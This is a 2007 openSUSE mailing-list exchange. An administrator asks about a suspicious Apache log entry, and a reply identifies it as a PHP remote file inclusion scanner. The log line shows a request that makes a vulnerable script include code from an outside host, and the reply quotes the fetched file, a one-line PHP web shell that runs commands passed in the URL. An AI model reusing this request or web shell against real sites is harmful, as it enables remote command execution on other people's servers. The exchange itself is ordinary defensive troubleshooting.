25 Apr
2007
25 Apr
'07
21:48
On Wed, Apr 25, 2007 at 01:45:34PM -0700, James D. Parra wrote:
Hello,
I found these errors in our web logs and it appears that either there is a PHP attack on the apache site or perhaps a kit on the server?
Errors below (profanity not mine);
69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~li sir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
Looks like some kind of PHP include attack scanner, against lots of PHP apps. M.txt contains: <? system($_GET['cmd']); die ("Morfeus hacked you"); ?> ciao, Marcus -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org